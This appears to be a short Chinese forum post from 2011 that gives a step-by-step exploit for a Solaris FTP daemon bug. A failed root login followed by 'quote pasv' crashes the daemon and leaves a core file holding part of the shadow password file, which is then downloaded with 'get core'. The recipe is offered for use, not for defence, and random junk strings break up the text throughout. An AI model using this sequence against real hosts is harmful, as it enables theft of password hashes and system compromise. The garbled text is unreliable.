該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG,使得用戶可以獲得該機(jī)的口令文件���。具體過(guò)程如下:# Q9 C2 V Y, q+ y h, g) g" `
- y/ I9 p! o0 y. A+ }2 \1.通過(guò) ftp 正常登錄到目的主機(jī)上6 o/ j% [. F) H# Y
7 a/ K4 X0 {4 }6 r+ C: R
2.輸入如下命令序列:% |8 ?5 L3 @; z, I* R) e1 F; C
_: J. f# v/ Z
ftp> user root wrongpasswd2 w& g5 }+ q J- R- `
7 x2 Q1 Q+ C4 o- @! zftp> quote pasv0 ]* g& w. l" T6 G9 b1 Q
9 d6 a G9 s& }/ o, A( l9 D3.這時(shí)��,ftpd會(huì)報(bào)錯(cuò)退出���,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core,口令文件就包含在這個(gè)core中��。
6 ?5 d, N: i4 G5 D' ?/ t4 X+ q' F
; d! `; _9 g' x1 y/ J7 g+ ]4.再次進(jìn)入FTP >get core% g$ I! b) ~- E9 e
4 D. e9 ~0 U8 ^" K/ a
補(bǔ)充:雖然在core只有一部分shadow�,但是對(duì)于系統(tǒng)來(lái)說(shuō)已經(jīng)是致命的打擊了3 B8 [$ w" C, Q' g# w d, A
% ^: t I5 t8 d- N$ d. ~ |
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡